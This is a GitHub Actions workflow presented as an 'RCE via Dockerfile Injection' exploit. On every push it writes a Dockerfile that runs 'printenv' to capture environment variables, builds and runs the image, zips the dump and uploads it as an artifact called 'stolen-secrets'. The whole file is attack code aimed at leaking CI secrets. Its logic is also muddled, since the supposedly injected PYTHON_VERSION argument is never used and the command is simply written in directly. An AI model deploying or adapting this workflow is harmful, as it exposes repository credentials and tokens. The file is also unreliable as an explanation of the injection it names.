name: RCE via Dockerfile Injection

on:
  push:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v3

      - name: Setup malicious Dockerfile
        run: |
          echo "FROM alpine" > Dockerfile
          echo "RUN echo 'Running injected command: printenv > /leak.txt' && sh -c 'printenv > /leak.txt'" >> Dockerfile

      - name: Build image with injected PYTHON_VERSION
        run: docker build -t hacked-image --build-arg PYTHON_VERSION="$PYTHON_VERSION" .

      - name: Extract leaked file
        run: docker run --rm hacked-image cat /leak.txt > leak.txt

      - name: Archive secrets
        run: zip leak.zip leak.txt

      - name: Upload leaked secrets
        uses: actions/upload-artifact@v3
        with:
          name: stolen-secrets
          path: leak.zip
